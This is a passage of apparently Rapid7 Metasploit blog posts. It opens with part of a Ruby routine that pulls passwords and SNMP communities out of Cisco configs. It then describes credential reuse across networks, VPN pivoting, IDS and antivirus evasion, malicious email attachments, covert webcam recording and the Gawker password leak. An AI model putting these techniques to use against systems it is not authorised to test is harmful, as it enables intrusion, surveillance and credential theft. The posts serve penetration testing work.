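    section = line.start_with?('line ') ? line : nil
    case line
    when /\Aenable password(?: (\d))? (\S+)/
      t = $1 || '0'
      desc = REVERSIBLE.fetch(t, "type #{t}")
      creds << { kind: 'enable', type: t.to_i, value: $2 }
      weak << "enable password (#{desc}) used instead of enable secret"
    when /\Aenable secret (\d) (\S+)/
      creds << { kind: 'enable', type: $1.to_i, value: $2 }
    when /\Ausername (\S+) .*?(?:password|secret) (\d) (\S+)/
      creds << { kind: "user #{$1}", type: $2.to_i, value: $3 }
      weak << "user #{$1}: password is #{REVERSIBLE[$2]}" if REVERSIBLE[$2]
    when /\Asnmp-server community (\S+) (RO|RW)/
      creds << { kind: "snmp #{$2}", type: 0, value: $1 }
      weak << "SNMP community '#{$1}' is read-write: config can be read and changed" if $2 == 'RW'
    when /\Aip http server\z/
      weak << 'HTTP management server enabled (auth-bypass and brute-force surface)'
    end
  end
  { credentials: creds, weaknesses: weak }
end

if __FILE__ == $PROGRAM_NAME
  report = audit_ios_config(SAMPLE_CONFIG)
  report[:credentials].each { |c| puts "cred  #{c[:kind]} (type #{c[:type]}): #{c[:value]}" }
  report[:weaknesses].each  { |w| puts "weak  #{w}" }
end
```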
Metasploit Express and Metasploit Pro can automatically recycle credentials obtained from these configuration files to gain access to other devices on the network. If you crack one Cisco device through a weak SNMP community and discover that the vty password is "ciscorules!", you can use the "known-only" profile of the brute force component to automatically try this password, via any protocol, against any other device on the network. Once you gain access to other devices, the configuration files are obtained  and the entire process starts again. You can easily apply a password taken from a Cisco router against the login page of an intranet site or leverage a password obtained through a traditional exploit to gain access to a multitude of network devices.  One of our development goals is  to ensure that our users can always identify and exploit the weakest link on a given network. 

That's it for this post,  please give the new features a whirl and let us know via comments if you have any questions or suggestions for improvements.


Originally Posted by Matt Barrett



This week the guys over at Offensive Security officially added Metasploit Pro to their curriculum for the class Penetration Testing with BackTrack. For those not familiar with it, BackTrack is a Linux distribution that includes a lot of tools for penetration testing. Since 2006, it has been downloaded three million times and has become the most widely used collection of penetration testing tools. BackTrack is funded by Offensive Security who, in turn, teach people how to use it.

Penetration Testing with BackTrack (PWB) is a phenomenal course that is well respected in corporate and open source circles alike. The fact that Metasploit Pro is now included in the course is excellent - and it makes sense. Feedback from industry experts on VPN pivoting in Metasploit Pro has been fantastic (check out this VPN pivoting introduction and this VPN pivoting how-to) but the question that keeps coming up is: What can I do once I have set up a VPN pivot?

Penetration testers using Metasploit Pro can now route all BackTrack Linux tools through a compromised target using VPN pivoting

Installing Metasploit Pro on BackTrack answers that question ten-fold. BackTrack has a ridiculous amount of reconnaissance, analysis and attack tools for you to choose from. In addition to running Metasploit Pro, how about some packet analysis with Wireshark? Maybe a nice man-in-the-middle attack to intercept PII (personally identifiable information) with Ettercap? How about we find a vulnerable wireless access point and clone it to grab everything from everybody using Karmetasploit (also an HD Moore project)? Using Metasploit Pro's VPN pivoting, you can tunnel all of these tools through a pwned host.

There are over 300 different tools that ship with BackTrack for every type of penetration testing work imaginable. Once you open the door with Metasploit Pro, the sky is the limit. You can find the Offensive Security blog post here. An excerpt:





"On a more personal note, like many people, I was a little uncertain when hearing about the acquisition of Metasploit by Rapid7 but they have demonstrated that they are dedicated to keeping the open-source version of Metasploit alive and well and Metasploit Pro is clearly an excellent product. From the ability to import multiple external file formats to the VPN pivoting to the wide range of reporting options, Metasploit Pro will be a great timesaver for those who choose to use it as their penetration testing tool of choice."


A big thank-you shout out to our friends at Offensive Security!

Originally Posted by Chris Kirsch



Secret passwords don’t only get you into Aladdin’s cave or the tree house, but also into corporate networks and bank accounts. Yet, they are one of the weakest ways to protect access. Sure, there are better ways to secure access, such as smart cards or one-time password tokens, but these are still far from being deployed everywhere although the technology has matured considerably over the past years. Passwords are still the easiest way into a network. 

The new Metasploit version 3.5.1 adds a lot of features to audit your network’s password security on many levels. Metasploit has always offered a broad range of brute forcing capabilities. Since version 3.5.1, it now also downloads the configuration files of Cisco routers and extracts their passwords. HD’s team has also added brute forcing of UNIX “r” services, such as rshell, rlogin and rexec, as well as VNC and SNMP services. Metasploit can also now import pcap network traffic logs to find clear text passwords, and to discover hosts and services. 

Metasploit has also become stealthier than ever: It now flies under the radar of intrusion detection (IDS) and intrusion prevention systems (IPS). An enhanced anti-virus evasion ensures that exploits are not stopped by end-point defenses. 

And for those of you enjoying a good cup of coffee while well-meaning end users do your job, we’ve added email attachments to social engineering campaigns that enable you to send out malicious PDF and MP3 files. 

Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. 

The new Metasploit version 3.5.1 is available for both the free, open source Metasploit Framework and the commercial editions Metasploit Express and Metasploit Pro. Here is an overview of the new features: 

Overview of the features added in version 3.5.1:



Network security
Comprehensive Cisco device exploitation
Additional network device audit and exploitation
Enhanced performance for port scans and host discovery
Network traffic analysis using pcap packet captures
Brute forcing
Brute force support for Unix “r” services (rshell, rlogin, rexec)
Brute force support for VNC desktop services
Brute force support for SNMP (devices)
New IDS/IPS evasion options for automated exploitation
Improved anti-virus evasion for executable templates

Social Engineering
File-format exploits now available for email campaigns (attach malicious PDF, MP3, etc.)

Web application security
Import and validate results from web application scanners
VPN pivoting for Metasploit on Windows

Network boundaries for project members





If you haven’t tried Metasploit Pro yet, get your free, fully featured Metasploit Pro trial.

Originally Posted by egypt



Rapid7 and the Metasploit Project are proud to announce version 3.5.1 of the Metasploit Framework! This minor version release adds 47 new modules, including exploit coverage for recent bugs in the news: Exim4, Internet Explorer, and ProFTPd. Java payloads have seen significant improvement and java_signed_applet can now use them for complete cross-platform no-exploit-required pwnage. Eight new meterpreter scripts were added, including smartlocker and schelevator, an exploit for the 0-day privilege escalation used by Stuxnet. Meterpreter itself now has support for remotely turning on and recording from webcams and microphones, completely in memory. You can now export stolen hashes in John the Ripper and pwdump formats, facilitating cracking with standard tools. PCAP support has been added to db_import, allowing you to pull in hosts and services without sending a single packet.


Development continues at break-neck speed with around 45 tickets closed since the last release.  This graph, from, summarizes the framework's increased pace quite well.




For this release, we've added a Linux installer that bundles Java and PostgreSQL.  Now you can run msfgui and use a database connection out of the box with zero configuration on Linux and Windows.  The new installers use a gui to ask you where to install, so for headless installations you can run them with "--mode text" to keep everything in a shell, or just accept all of the defaults with "--mode unattended".


For more details, see the full 3.5.1 release notes.  As always, the latest version is available from the Metasploit download page.

Semipublic Password Dumps

Posted by rapid7-admin Dec 13, 2010

Originally Posted by todb



I woke up this morning to find reddits abuzz with the latest password dump, this time from Gawker and related properties. The splashy headline is usually something around "1.3 million Gawker passwords leaked." I wanted to write a couple words here since the areas of credential management, password complexity, and attack mitigation are all near and dear to my heart.


Firstly, the "1.3 million passwords" figure is a little bit of a misnomer. There are a bunch of files floating around the torrent sites, one of which is, indeed, a "full" database dump of usernames, encrypted passwords, and e-mail addresses. That file is 1,247,894 lines. Trouble is, the raw data isn't normalized at all, and so there are actually right around a half million e-mail addresses, and something close to ~200k complete username + password + e-mail address credentials. That all said, the data most people are actually looking at today is 188,281 credentials strong, which is the pre-cracked list of credentials distributed with the drop (one exception is the guys at Duo Security, who are cracking the DES-encrypted passwords independently).


Secondly, these passwords, in the main, are not very high value, which is assuredly one reason why they were released. In very modern jurisdictions like California and the EU, the leak of e-mail addresses is much more serious. These passwords are just not that big of a deal, since they're used by people to comment on celebrity gossip, so these kinds of throwaway credentials are pretty common for public blogs.


This reminds me of something that a pen-test friend once said -- while "password" and "123456" are pretty common tokens on the Internet -- just look at the SkullSecurity lists. However, you find them a whole lot less on intranets, since your company's administrator is probably enforcing some kind of complexity and rotation policy. For internal networks, you find dates and days of the week a lot more often as passwords, since something like "Dec-13-2010" meets most complexity requirements and is really easy to rotate on a schedule.


Of course, some of these are (were) legit passwords that will (did) work against Twitter, Facebook, and e-mail accounts with the same username, but I wouldn't get all apoplectic over them. Rest assured, the passwords that also work (worked) for e-mail addresses have almost certainly already been compromised. Two hundred thousand credentials is not all that hard to churn through with even college-kid resources.


Finally, the password dump itself is, while headline-grabbing, less interesting to incident response and computer forensics dorks than the clues in the collateral files as to how the attackers got access in the first place. It looks like it's a pretty typical PHP attack vector, and, as Egyp7 once quipped, "PHP is a virtual machine for shellcode." Clearly, some level of source code security auditing would have gone a long way to help Gawker avoid these headlines today. In addition, there's the whole secondary story that the attackers also gained access to Gawker's content management system (CMS). This is a huge deal -- like most purely online businesses, Gawker takes their code's secrecy pretty seriously.


At any rate, public dumps of actual passwords like these are always interesting from a research perspective -- it's nice to have the opportunity to check in on the current state of throwaway accounts. While this all sucks for Gawker, the security community benefits from large-ish datasets like this, since papers get written and there are renewed pushes for proper encryption of stored passwords and passwordless authentication schemes. Hopefully, the overall security posture of the Internet ends up improved.
